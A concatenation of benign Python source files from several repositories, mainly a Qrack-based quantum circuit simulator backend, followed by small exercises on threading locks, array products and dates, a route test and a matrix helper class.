'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Single-qubit gate with three rotation angles',
'qasm_def': 'gate u(theta,phi,lam) q { U(theta,phi,lam) q; }'
}, {
'name': 'u1',
'parameters': ['lam'],
'conditional': True,
'description': 'Single-qubit gate [[1, 0], [0, exp(1j*lam)]]',
'qasm_def': 'gate u1(lam) q { U(0,0,lam) q; }'
}, {
'name': 'u2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description':
'Single-qubit gate [[1, -exp(1j*lam)], [exp(1j*phi), exp(1j*(phi+lam))]]/sqrt(2)',
'qasm_def': 'gate u2(phi,lam) q { U(pi/2,phi,lam) q; }'
}, {
'name': 'u3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Single-qubit gate with three rotation angles',
'qasm_def': 'gate u3(theta,phi,lam) q { U(theta,phi,lam) q; }'
}, {
'name': 'r',
            'parameters': ['theta', 'phi'],
            'conditional': True,
            'description': 'Single-qubit rotation gate about the cos(phi)X + sin(phi)Y axis',
            'qasm_def': 'gate r(theta,phi) q { U(theta, phi - pi/2, -phi + pi/2) q; }'
}, {
'name': 'rx',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-X axis rotation gate',
'qasm_def': 'TODO'
}, {
'name': 'ry',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Y axis rotation gate',
'qasm_def': 'TODO'
}, {
'name': 'rz',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Z axis rotation gate',
'qasm_def': 'TODO'
}, {
'name': 'h',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Hadamard gate',
'qasm_def': 'TODO'
}, {
'name': 'x',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-X gate',
'qasm_def': 'gate x a { U(pi,0,pi) a; }'
}, {
'name': 'y',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'z',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Z gate',
'qasm_def': 'TODO'
}, {
'name': 's',
'parameters': [],
'conditional': True,
'description': 'Single-qubit phase gate',
'qasm_def': 'TODO'
}, {
'name': 'sdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint phase gate',
'qasm_def': 'TODO'
}, {
'name': 'sx',
'parameters': [],
'conditional': True,
'description': 'Single-qubit square root of Pauli-X gate',
'qasm_def': 'gate sx a { rz(-pi/2) a; h a; rz(-pi/2); }'
}, {
'name': 'sxdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit inverse square root of Pauli-X gate',
'qasm_def': 'TODO'
}, {
'name': 'p',
            'parameters': ['lam'],
            'conditional': True,
            'description': 'Single-qubit phase gate [[1, 0], [0, exp(1j*lam)]]',
            'qasm_def': 'gate p(lam) q { U(0,0,lam) q; }'
}, {
'name': 't',
'parameters': [],
'conditional': True,
'description': 'Single-qubit T gate',
'qasm_def': 'TODO'
}, {
'name': 'tdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint T gate',
'qasm_def': 'TODO'
}, {
'name': 'cu',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u gate',
'qasm_def': 'TODO'
}, {
'name': 'cu1',
'parameters': ['lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'cx',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-NOT gate',
'qasm_def': 'gate cx c,t { CX c,t; }'
}, {
'name': 'cy',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'cz',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-Z gate',
'qasm_def': 'gate cz a,b { h b; cx a,b; h b; }'
}, {
'name': 'ch',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-H gate',
'qasm_def': 'TODO'
}, {
'name': 'cp',
'parameters': [],
'conditional': True,
'description': 'Controlled-Phase gate',
'qasm_def': 'TODO'
}, {
'name': 'csx',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled square root of Pauli-X gate',
'qasm_def': 'TODO'
}, {
'name': 'csxdg',
'parameters': [],
'conditional': True,
'description': 'Two-qubit controlled inverse square root of Pauli-X gate',
'qasm_def': 'TODO'
}, {
'name': 'dcx',
'parameters': [],
'conditional': True,
'description': 'Double-CNOT gate',
'qasm_def': 'TODO'
}, {
'name': 'ccx',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Toffoli gate',
'qasm_def': 'TODO'
}, {
'name': 'ccy',
'parameters': [],
'conditional': True,
'description': 'Three-qubit controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'ccz',
'parameters': [],
'conditional': True,
'description': 'Three-qubit controlled-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'mcx',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-X gate',
'qasm_def': 'TODO'
}, {
'name': 'mcy',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'mcz',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu1',
'parameters': ['lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'swap',
'parameters': [],
'conditional': True,
'description': 'Two-qubit SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'iswap',
'parameters': [],
'conditional': True,
'description': 'Two-qubit ISWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'cswap',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Fredkin (controlled-SWAP) gate',
'qasm_def': 'TODO'
}, {
'name': 'mcswap',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'measure',
'parameters': [],
'conditional': True,
'description': 'Measure qubit',
'qasm_def': 'TODO'
}, {
'name': 'reset',
'parameters': [],
'conditional': True,
'description': 'Reset qubit to 0 state',
'qasm_def': 'TODO'
}, {
'name': 'barrier',
'parameters': [],
'conditional': True,
'description': 'Barrier primitive for quantum circuit',
'qasm_def': 'TODO'
}]
}
def __init__(self, configuration=None, provider=None, **fields):
"""Initialize a backend class
Args:
configuration (BackendConfiguration): A backend configuration
object for the backend object.
provider (qiskit.providers.Provider): Optionally, the provider
object that this Backend comes from.
fields: kwargs for the values to use to override the default
options.
Raises:
AttributeError: if input field not a valid options
..
This next bit is necessary just because autosummary generally won't summarise private
methods; changing that behaviour would have annoying knock-on effects through all the
rest of the documentation, so instead we just hard-code the automethod directive.
In addition to the public abstract methods, subclasses should also implement the following
private methods:
.. automethod:: _default_options
"""
configuration = configuration or BackendConfiguration.from_dict(self.DEFAULT_CONFIGURATION)
self._number_of_qubits = 0
self._number_of_clbits = 0
self._shots = 1
self._configuration = configuration
self._options = self._default_options()
self._provider = provider
if fields:
for field in fields:
if field not in self.DEFAULT_OPTIONS:
raise AttributeError("Options field %s is not valid for this backend" % field)
self._options.update_options(**fields)
@classmethod
def _default_options(cls):
"""Return the default options
This method will return a :class:`qiskit.providers.Options`
subclass object that will be used for the default options. These
should be the default parameters to use for the options of the
backend.
Returns:
qiskit.providers.Options: A options object with
default values set
"""
# WARNING: The above prototype for return type doesn't work in BackEndV1 in Qiskit v0.30.0.
# We're resorting to duck typing.
_def_opts = Options()
_def_opts.update_options(**cls.DEFAULT_OPTIONS)
return _def_opts
def run(self, run_input, **options):
"""Run on the backend.
        This method returns a :class:`~qiskit.providers.Job` object
        that runs circuits. Depending on the backend this may be either an async
        or sync call. It is at the discretion of the provider to decide whether
running should block until the execution is finished or not. The Job
class can handle either situation.
Args:
run_input (QuantumCircuit or Schedule or list): An individual or a
list of :class:`~qiskit.circuits.QuantumCircuit` or
:class:`~qiskit.pulse.Schedule` objects to run on the backend.
                For legacy providers migrating to the new versioned provider
                interface, :class:`~qiskit.qobj.QasmQobj` or
:class:`~qiskit.qobj.PulseQobj` objects should probably be
supported too (but deprecated) for backwards compatibility. Be
sure to update the docstrings of subclasses implementing this
method to document that. New provider implementations should not
do this though as :mod:`qiskit.qobj` will be deprecated and
removed along with the legacy providers interface.
options: Any kwarg options to pass to the backend for running the
config. If a key is also present in the options
attribute/object then the expectation is that the value
specified will be used instead of what's set in the options
object.
Returns:
Job: The job object for the run
"""
qrack_options = {
'isSchmidtDecomposeMulti': options.is_schmidt_decompose_multi if hasattr(options, 'is_schmidt_decompose_multi') else self._options.get('is_schmidt_decompose_multi'),
'isSchmidtDecompose': options.is_schmidt_decompose if hasattr(options, 'is_schmidt_decompose') else self._options.get('is_schmidt_decompose'),
'isStabilizerHybrid': options.is_stabilizer_hybrid if hasattr(options, 'is_stabilizer_hybrid') else self._options.get('is_stabilizer_hybrid'),
'isBinaryDecisionTree': options.is_binary_decision_tree if hasattr(options, 'is_binary_decision_tree') else self._options.get('is_binary_decision_tree'),
'isPaged': options.is_paged if hasattr(options, 'is_paged') else self._options.get('is_paged'),
'isCpuGpuHybrid': options.is_cpu_gpu_hybrid if hasattr(options, 'is_cpu_gpu_hybrid') else self._options.get('is_cpu_gpu_hybrid'),
'isHostPointer': options.is_host_pointer if hasattr(options, 'is_host_pointer') else self._options.get('is_host_pointer'),
}
data = run_input.config.memory if hasattr(run_input, 'config') else []
self._shots = options['shots'] if 'shots' in options else (run_input.config.shots if hasattr(run_input, 'config') else self._options.get('shots'))
self.is_t = options.is_t_injected if hasattr(options, 'is_t_injected') else self._options.get('is_t_injected')
self.is_reactive = options.is_reactively_separated if hasattr(options, 'is_reactively_separated') else self._options.get('is_reactively_separated')
qobj_id = options['qobj_id'] if 'qobj_id' in options else (run_input.qobj_id if hasattr(run_input, 'config') else '')
qobj_header = options['qobj_header'] if 'qobj_header' in options else (run_input.header if hasattr(run_input, 'config') else {})
job_id = str(uuid.uuid4())
job = QrackJob(self, job_id, self._run_job(job_id, run_input, data, qobj_id, qobj_header, **qrack_options), run_input)
return job
def _run_job(self, job_id, run_input, data, qobj_id, qobj_header, **options):
"""Run experiments in run_input
Args:
job_id (str): unique id for the job.
run_input (QuantumCircuit or Schedule or list): job description
Returns:
Result: Result object
"""
start = time.time()
self._data = data
experiments = run_input.experiments if hasattr(run_input, 'config') else run_input
if isinstance(experiments, QuantumCircuit):
experiments = [experiments]
results = []
for experiment in experiments:
results.append(self.run_experiment(experiment, **options))
return Result(
backend_name = self.name(),
backend_version = self._configuration.backend_version,
qobj_id = qobj_id,
job_id = job_id,
success = True,
results = results,
date = datetime.now(),
status = 'COMPLETED',
header = QrackExperimentHeader(qobj_header) if type(qobj_header) is dict else qobj_header,
time_taken = (time.time() - start)
)
def run_experiment(self, experiment, **options):
"""Run an experiment (circuit) and return a single experiment result.
Args:
experiment (QobjExperiment): experiment from qobj experiments list
Returns:
            dict: A dictionary of results.
Raises:
QrackError: If the number of qubits is too large, or another
error occurs during execution.
"""
start = time.time()
instructions = []
if isinstance(experiment, QasmQobjExperiment):
self._number_of_qubits = experiment.header.n_qubits
self._number_of_clbits = experiment.header.memory_slots
instructions = experiment.instructions
elif isinstance(experiment, QuantumCircuit):
self._number_of_qubits = len(experiment.qubits)
self._number_of_clbits = len(experiment.clbits)
for datum in experiment._data:
qubits = []
for qubit in datum[1]:
qubits.append(experiment.qubits.index(qubit))
clbits = []
for clbit in datum[2]:
clbits.append(experiment.clbits.index(clbit))
conditional = None
condition = datum[0].condition
if condition is not None:
if isinstance(condition[0], Clbit):
conditional = experiment.clbits.index(condition[0])
else:
creg_index = experiment.cregs.index(condition[0])
size = experiment.cregs[creg_index].size
offset = 0
for i in range(creg_index):
offset += len(experiment.cregs[i])
mask = ((1 << offset) - 1) ^ ((1 << (offset + size)) - 1)
val = condition[1]
conditional = offset if (size == 1) else QrackQasmQobjInstructionConditional(mask, val)
instructions.append(QasmQobjInstruction(
datum[0].name,
qubits = qubits,
memory = clbits,
condition=condition,
conditional=conditional,
params = datum[0].params
))
else:
raise QrackError('Unrecognized "run_input" argument specified for run().')
self._sample_qubits = []
self._sample_clbits = []
self._sample_cregbits = []
self._data = []
self._sample_measure = True
shotsPerLoop = self._shots
shotLoopMax = 1
is_initializing = True
boundary_start = -1
for opcount in range(len(instructions)):
operation = instructions[opcount]
if operation.name == 'id' or operation.name == 'barrier':
continue
if is_initializing and ((operation.name == 'measure') or (operation.name == 'reset')):
continue
is_initializing = False
if (operation.name == 'measure') or (operation.name == 'reset'):
if boundary_start == -1:
boundary_start = opcount
if (boundary_start != -1) and (operation.name != 'measure'):
shotsPerLoop = 1
shotLoopMax = self._shots
self._sample_measure = False
break
preamble_memory = 0
preamble_register = 0
preamble_sim = None
if self._sample_measure or boundary_start <= 0:
boundary_start = 0
self._sample_measure = True
shotsPerLoop = self._shots
shotLoopMax = 1
else:
boundary_start -= 1
if boundary_start > 0:
self._sim = QrackSimulator(qubitCount = self._number_of_qubits, **options)
self._sim.set_t_injection(self.is_t)
self._sim.set_reactive_separate(self.is_reactive)
self._classical_memory = 0
self._classical_register = 0
for operation in instructions[:boundary_start]:
self._apply_op(operation)
preamble_memory = self._classical_memory
preamble_register = self._classical_register
preamble_sim = self._sim
for shot in range(shotLoopMax):
if preamble_sim is None:
self._sim = QrackSimulator(qubitCount = self._number_of_qubits, **options)
self._sim.set_t_injection(self.is_t)
self._sim.set_reactive_separate(self.is_reactive)
self._classical_memory = 0
self._classical_register = 0
else:
self._sim = QrackSimulator(cloneSid = preamble_sim.sid)
self._sim.set_t_injection(self.is_t)
self._sim.set_reactive_separate(self.is_reactive)
self._classical_memory = preamble_memory
self._classical_register = preamble_register
for operation in instructions[boundary_start:]:
self._apply_op(operation)
if not self._sample_measure and (len(self._sample_qubits) > 0):
self._data += [hex(int(bin(self._classical_memory)[2:], 2))]
self._sample_qubits = []
self._sample_clbits = []
self._sample_cregbits = []
if self._sample_measure and (len(self._sample_qubits) > 0):
self._data = self._add_sample_measure(self._sample_qubits, self._sample_clbits, self._shots)
data = { 'counts': dict(Counter(self._data)) }
if isinstance(experiment, QasmQobjExperiment):
data['memory'] = self._data
data = QrackExperimentResultData(**data)
else:
data = pd.DataFrame(data=data)
metadata = { 'measure_sampling': self._sample_measure }
if isinstance(experiment, QuantumCircuit) and hasattr(experiment, 'metadata') and experiment.metadata:
metadata = experiment.metadata
metadata['measure_sampling'] = self._sample_measure
return QrackExperimentResult(
shots = self._shots,
data = data,
status = 'DONE',
success = True,
header = experiment.header if isinstance(experiment, QasmQobjExperiment) else QrackExperimentResultHeader(name = experiment.name),
meta_data = metadata,
time_taken = (time.time() - start)
)
def _apply_op(self, operation):
name = operation.name
if (name == 'id') or (name == 'barrier'):
        # id and barrier are no-ops for the simulator state
return
conditional = getattr(operation, 'conditional', None)
if isinstance(conditional, int):
conditional_bit_set = (self._classical_register >> conditional) & 1
if not conditional_bit_set:
return
elif conditional is not None:
mask = int(conditional.mask, 16)
if mask > 0:
value = self._classical_memory & mask
while (mask & 0x1) == 0:
mask >>= 1
value >>= 1
if value != int(conditional.val, 16):
return
if (name == 'u1') or (name == 'p'):
self._sim.u(operation.qubits[0], 0, 0, float(operation.params[0]))
elif name == 'u2':
self._sim.u(operation.qubits[0], np.pi / 2, float(operation.params[0]), float(operation.params[1]))
elif (name == 'u3') or (name == 'u'):
self._sim.u(operation.qubits[0], float(operation.params[0]), float(operation.params[1]), float(operation.params[2]))
elif name == 'r':
self._sim.u(operation.qubits[0], float(operation.params[0]), float(operation.params[1]) - np.pi/2, (-1 * float(operation.params[1])) + np.pi/2)
elif (name == 'unitary') and (len(operation.qubits) == 1):
self._sim.mtrx(operation.params[0].flatten(), operation.qubits[0])
elif name == 'rx':
self._sim.r(Pauli.PauliX, float(operation.params[0]), operation.qubits[0])
elif name == 'ry':
self._sim.r(Pauli.PauliY, float(operation.params[0]), operation.qubits[0])
elif name == 'rz':
self._sim.r(Pauli.PauliZ, float(operation.params[0]), operation.qubits[0])
elif name == 'h':
self._sim.h(operation.qubits[0])
elif name == 'x':
self._sim.x(operation.qubits[0])
elif name == 'y':
self._sim.y(operation.qubits[0])
elif name == 'z':
self._sim.z(operation.qubits[0])
elif name == 's':
self._sim.s(operation.qubits[0])
elif name == 'sdg':
self._sim.adjs(operation.qubits[0])
elif name == 'sx':
self._sim.mtrx([(1+1j)/2, (1-1j)/2, (1-1j)/2, (1+1j)/2], operation.qubits[0])
elif name == 'sxdg':
self._sim.mtrx([(1-1j)/2, (1+1j)/2, (1+1j)/2, (1-1j)/2], operation.qubits[0])
elif name == 't':
self._sim.t(operation.qubits[0])
elif name == 'tdg':
self._sim.adjt(operation.qubits[0])
elif name == 'cu1':
self._sim.mcu(operation.qubits[0:1], operation.qubits[1], 0, 0, float(operation.params[0]))
elif name == 'cu2':
self._sim.mcu(operation.qubits[0:1], operation.qubits[1], np.pi / 2, float(operation.params[0]), float(operation.params[1]))
elif (name == 'cu3') or (name == 'cu'):
self._sim.mcu(operation.qubits[0:1], operation.qubits[1], float(operation.params[0]), float(operation.params[1]), float(operation.params[2]))
elif name == 'cx':
self._sim.mcx(operation.qubits[0:1], operation.qubits[1])
elif name == 'cy':
self._sim.mcy(operation.qubits[0:1], operation.qubits[1])
elif name == 'cz':
self._sim.mcz(operation.qubits[0:1], operation.qubits[1])
elif name == 'ch':
self._sim.mch(operation.qubits[0:1], operation.qubits[1])
elif name == 'cp':
self._sim.mcmtrx(operation.qubits[0:1], [1, 0, 0, np.exp(1j * float(operation.params[0]))], operation.qubits[1])
elif name == 'csx':
self._sim.mcmtrx(operation.qubits[0:1], [(1+1j)/2, (1-1j)/2, (1-1j)/2, (1+1j)/2], operation.qubits[1])
elif name == 'csxdg':
self._sim.mcmtrx(operation.qubits[0:1], [(1-1j)/2, (1+1j)/2, (1+1j)/2, (1-1j)/2], operation.qubits[1])
elif name == 'dcx':
self._sim.mcx(operation.qubits[0:1], operation.qubits[1])
self._sim.mcx(operation.qubits[1:2], operation.qubits[0])
elif name == 'ccx':
self._sim.mcx(operation.qubits[0:2], operation.qubits[2])
elif name == 'ccy':
self._sim.mcy(operation.qubits[0:2], operation.qubits[2])
elif name == 'ccz':
self._sim.mcz(operation.qubits[0:2], operation.qubits[2])
elif name == 'mcx':
self._sim.mcx(operation.qubits[0:-1], operation.qubits[-1])
elif name == 'mcy':
self._sim.mcy(operation.qubits[0:-1], operation.qubits[-1])
elif name == 'mcz':
self._sim.mcz(operation.qubits[0:-1], operation.qubits[-1])
elif name == 'swap':
self._sim.swap(operation.qubits[0], operation.qubits[1])
elif name == 'iswap':
self._sim.iswap(operation.qubits[0], operation.qubits[1])
elif name == 'cswap':
self._sim.cswap(operation.qubits[0:1], operation.qubits[1], operation.qubits[2])
elif name == 'mcswap':
self._sim.cswap(operation.qubits[:-2], operation.qubits[-2], operation.qubits[-1])
elif name == 'reset':
qubits = operation.qubits
for qubit in qubits:
if self._sim.m(qubit):
self._sim.x(qubit)
elif name == 'measure':
qubits = operation.qubits
clbits = operation.memory
cregbits = operation.register if hasattr(operation, 'register') else len(operation.qubits) * [-1]
self._sample_qubits += qubits
self._sample_clbits += clbits
self._sample_cregbits += cregbits
if not self._sample_measure:
for index in range(len(qubits)):
qubit_outcome = self._sim.m(qubits[index])
clbit = clbits[index]
clmask = 1 << clbit
self._classical_memory = (self._classical_memory & (~clmask)) | (qubit_outcome << clbit)
cregbit = cregbits[index]
if cregbit < 0:
cregbit = clbit
regbit = 1 << cregbit
self._classical_register = (self._classical_register & (~regbit)) | (qubit_outcome << cregbit)
elif name == 'bfunc':
mask = int(operation.mask, 16)
relation = operation.relation
val = int(operation.val, 16)
cregbit = operation.register
cmembit = operation.memory if hasattr(operation, 'memory') else None
compared = (self._classical_register & mask) - val
if relation == '==':
outcome = (compared == 0)
elif relation == '!=':
outcome = (compared != 0)
elif relation == '<':
outcome = (compared < 0)
elif relation == '<=':
outcome = (compared <= 0)
elif relation == '>':
outcome = (compared > 0)
elif relation == '>=':
outcome = (compared >= 0)
else:
raise QrackError('Invalid boolean function relation.')
# Store outcome in register and optionally memory slot
regbit = 1 << cregbit
self._classical_register = \
(self._classical_register & (~regbit)) | (int(outcome) << cregbit)
if cmembit is not None:
membit = 1 << cmembit
self._classical_memory = \
(self._classical_memory & (~membit)) | (int(outcome) << cmembit)
else:
backend = self.name()
err_msg = '{0} encountered unrecognized operation "{1}"'
raise QrackError(err_msg.format(backend, operation))
def _add_sample_measure(self, sample_qubits, sample_clbits, num_samples):
"""Generate data samples from current statevector.
Taken almost straight from the terra source code.
Args:
            sample_qubits (list): Qubits of the measure instructions to sample.
            sample_clbits (list): Classical bits that receive the sampled outcomes.
num_samples (int): The number of data samples to generate.
Returns:
list: A list of data values in hex format.
"""
# Get unique qubits that are actually measured
measure_qubit = [qubit for qubit in sample_qubits]
measure_clbit = [clbit for clbit in sample_clbits]
# Sample and convert to bit-strings
data = []
if num_samples == 1:
sample = self._sim.m_all()
result = 0
for index in range(len(measure_qubit)):
qubit = measure_qubit[index]
qubit_outcome = ((sample >> qubit) & 1)
result |= qubit_outcome << index
measure_results = [result]
else:
measure_results = self._sim.measure_shots(measure_qubit, num_samples)
for sample in measure_results:
for index in range(len(measure_qubit)):
qubit_outcome = ((sample >> index) & 1)
clbit = measure_clbit[index]
clmask = 1 << clbit
self._classical_memory = (self._classical_memory & (~clmask)) | (qubit_outcome << clbit)
data.append(hex(int(bin(self._classical_memory)[2:], 2)))
return data
@staticmethod
def name():
return 'qasm_simulator'
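# --- Illustrative usage sketch (an assumption, not part of the provider source) ---
# Runs a Bell-state circuit on this backend; assumes qiskit and pyqrack are
# installed and that QrackJob exposes result() like other Qiskit job classes.
if __name__ == '__main__':
    from qiskit import QuantumCircuit
    bell = QuantumCircuit(2, 2)
    bell.h(0)
    bell.cx(0, 1)
    bell.measure([0, 1], [0, 1])
    job = QasmSimulator().run(bell, shots=100)
    # Counts are keyed by hex bitstrings, so a Bell pair should split
    # between '0x0' and '0x3'.
    print(job.result().results[0].data.counts)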
|
[
"stranoj@gmail.com"
] |
stranoj@gmail.com
|
b78c3c5f2faad82ecfe45b65041406cf264ae80e
|
5a9d8c64c6478f3816b63f59f1cdaca73c0848eb
|
/pythonNet/ex07_Thread/thread_lock.py
|
b687422687b6cca1365840560f6693dda88bc5b3
|
[] |
no_license
|
wangredfei/nt_py
|
f68134977e6d1e05cf17cec727644509f084c462
|
fedf03c0d52565f588e9b342d1c51df0b6dc2681
|
refs/heads/master
| 2020-04-08T07:55:08.302589
| 2018-11-23T09:53:48
| 2018-11-23T09:53:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
py
|
from threading import Thread, Lock
a = b = 0
lock = Lock()
def fun():
    # Reader thread: because every update to a and b happens under the same
    # lock, this thread should never observe a != b.
    while True:
        lock.acquire()
        if a != b:
            print("a=%d,b=%d" % (a, b))
        lock.release()
t = Thread(target=fun)
t.start()
while True:
    # Writer loop: `with lock` acquires and releases the shared lock, making
    # the two increments atomic with respect to the reader.
    with lock:
        a += 1
        b += 1
t.join()  # unreachable due to the infinite loop above; kept from the original demo
|
[
"289498360@qq.com"
] |
289498360@qq.com
|
a875518df17d09ffcfcba9970868520e03dcd877
|
3a73374a708037368f587ba6379ec2fd0b48851a
|
/array/product_array.py
|
719eef575d612a9c2963fb90dc4b510d789a6f0d
|
[] |
no_license
|
swatia-code/data_structure_and_algorithm
|
948d3b39d649d5bd6e3aabaefedbcd09098906d2
|
7219ff9c5a5b0c565b3f17095775d902a92e3d83
|
refs/heads/master
| 2023-03-30T08:49:48.350623
| 2021-04-02T08:44:30
| 2021-04-02T08:44:30
| 254,819,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
"""
PROBLEM STATEMENT
-----------------
Given an array arr[] of n integers, construct a Product Array prod[] (of same size) such that prod[i] is equal to the
product of all the elements of arr[] except arr[i]. Solve it without division operator in O(n) time.
Example :
Input: arr[] = {10, 3, 5, 6, 2}
Output: prod[] = {180, 600, 360, 300, 900}
3 * 5 * 6 * 2 product of other array
elements except 10 is 180
10 * 5 * 6 * 2 product of other array
elements except 3 is 600
10 * 3 * 6 * 2 product of other array
elements except 5 is 360
10 * 3 * 5 * 2 product of other array
elements except 6 is 300
10 * 3 * 6 * 5 product of other array
elements except 2 is 900
Input: arr[] = {1, 2, 3, 4, 5}
Output: prod[] = {120, 60, 40, 30, 24 }
2 * 3 * 4 * 5 product of other array
elements except 1 is 120
1 * 3 * 4 * 5 product of other array
elements except 2 is 60
1 * 2 * 4 * 5 product of other array
elements except 3 is 40
1 * 2 * 3 * 5 product of other array
elements except 4 is 30
1 * 2 * 3 * 4 product of other array
elements except 5 is 24
TIME COMPLEXITY
----------------
O(N)
CODE
----
"""
def productExceptSelf(arr, n):
#code here
val = [1 for _ in range(n)]
temp = 1
for i in range(n):
val[i] = temp
temp = temp * arr[i]
temp = 1
for i in range(n - 1, -1, -1):
val[i] = val[i] * temp
temp = temp * arr[i]
return val
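# Quick check against the worked examples in the docstring (illustrative addition):
if __name__ == '__main__':
    print(productExceptSelf([10, 3, 5, 6, 2], 5))  # [180, 600, 360, 300, 900]
    print(productExceptSelf([1, 2, 3, 4, 5], 5))   # [120, 60, 40, 30, 24]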
|
[
"noreply@github.com"
] |
swatia-code.noreply@github.com
|
da7ab4476cc7860aa2dc1bb9fe4ba9d91471885e
|
750b511104b85fa3ba923c00f2857e028800cb26
|
/task14.py
|
3d33dcc58ecce65615eb3037a1a98cf380ed00d0
|
[] |
no_license
|
noozip2241993/basic-python
|
85b8aaa6689d1ec940ebf5268e3cff91525685c6
|
a10fc3a72446cd13ae9cf4efe52d68423c514b3c
|
refs/heads/master
| 2023-02-07T06:03:32.128940
| 2021-01-01T23:41:48
| 2021-01-01T23:41:48
| 326,075,092
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
from datetime import date
def calculate_number_of_days(y=1, m=1, d=1):
    # Map a calendar date to an absolute day count so two dates can be subtracted;
    # the original returned only the day-of-month, which breaks across months.
    return date(y, m, d).toordinal()
days = calculate_number_of_days(2014, 7, 11) - calculate_number_of_days(2014, 7, 2)
print(days)
|
[
"khang.nguyen@student.csulb.edu"
] |
khang.nguyen@student.csulb.edu
|
82534abd8c0f2fc0874087dedea8f407ef9ed51f
|
f6ac57ca8023f51daa43ff35f7cfb6521f747575
|
/tests/test_conn.py
|
eacd2a12b70351f8751c47271a88f74eadf9a9cf
|
[] |
no_license
|
Thomas95i/cours_insta
|
879a36a5255b3e51ae8dc657d34951f71a5100aa
|
16454e3acc40076d1a4103ea533e891094c61fec
|
refs/heads/master
| 2022-12-18T09:02:05.181296
| 2020-02-21T15:03:11
| 2020-02-21T15:03:11
| 241,927,710
| 0
| 0
| null | 2022-12-08T03:42:27
| 2020-02-20T16:05:27
|
Python
|
UTF-8
|
Python
| false
| false
| 69
|
py
|
def test_conn(client):
    # Smoke test: the root route should answer with HTTP 200.
    assert client.get('/').status_code == 200
|
[
"tom_barbot@hotmail.fr"
] |
tom_barbot@hotmail.fr
|
83c2d0827eddf2bf025f32a2e000ac311cbef558
|
afb651a874076b7034cd448b40bceb91c0bc10d1
|
/oculoenv/geom.py
|
a864bab652a3e19152db4cfba9af14a2d866a49b
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
wbap/oculoenv
|
38bab908cf7d1b45d71249e6b8ab35008fe3c642
|
a8e25b41bcfaa7454c9ba9326f08eb3519456770
|
refs/heads/master
| 2023-03-18T01:18:13.169124
| 2023-03-12T00:52:32
| 2023-03-12T00:52:32
| 139,673,527
| 6
| 10
|
Apache-2.0
| 2023-03-12T00:52:33
| 2018-07-04T05:42:14
|
Python
|
UTF-8
|
Python
| false
| false
| 3,313
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
class Matrix4(object):
def __init__(self, m=None):
# numpy ndarray stores values in row major order
if m is None:
self.m = np.identity(4, dtype=np.float32)
else:
self.m = m
def set_trans(self, v):
""" Set translation element of the matrix.
Arguments:
v: Float array, element size should be 3 or 4.
if the size is 4, the fourth value should be 1.0
"""
for i in range(len(v)):
self.m[i, 3] = v[i]
def transform(self, v):
""" Set translation element of the matrix.
Arguments:
v: Float array, element size should be 3 or 4.
if the size is 4, the fourth value should be 1.0
Returns:
Float array of length 4. A transformed vector.
"""
if len(v) == 3:
v = (v + [1.0])
return self.m.dot(v)
def set_rot_x(self, angle):
""" Set matrix with rotation around x axis.
Arguments:
angle: Float, (radian) angle
"""
s = math.sin(angle)
c = math.cos(angle)
mv = [[1.0, 0.0, 0.0, 0.0],
[0.0, c, -s, 0.0],
[0.0, s, c, 0.0],
[0.0, 0.0, 0.0, 1.0]]
